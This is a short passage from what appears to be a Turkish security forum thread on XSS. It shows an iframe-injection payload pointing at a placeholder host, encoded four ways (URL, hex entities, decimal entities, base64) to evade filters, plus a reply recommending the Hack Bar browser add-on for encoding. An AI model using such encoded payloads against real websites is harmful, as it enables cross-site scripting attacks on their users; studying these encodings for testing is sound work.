    
    
    %3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E
    
    &#x3C;&#x69;&#x66;&#x72;&#x61;&#x6D;&#x65;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x74;&#x65;&#x73;&#x74;&#x2E;&#x64;&#x65;&#x3E;
    
    &#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#46&#100&#101&#62
    
    PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+

    Önemsediğin Kadar Önemsenirsin. Önemsendiğin Kadar Önemsensersin.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Holyzone
    Holyzone's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 13/Ekim/2008
    Erkek

    Firefox, Hack Bar eklentisini edinirseniz XSS için encoding, decoding falan yapmak oldukça basitleşecektir.

Toplam Hit: 1501 Toplam Mesaj: 2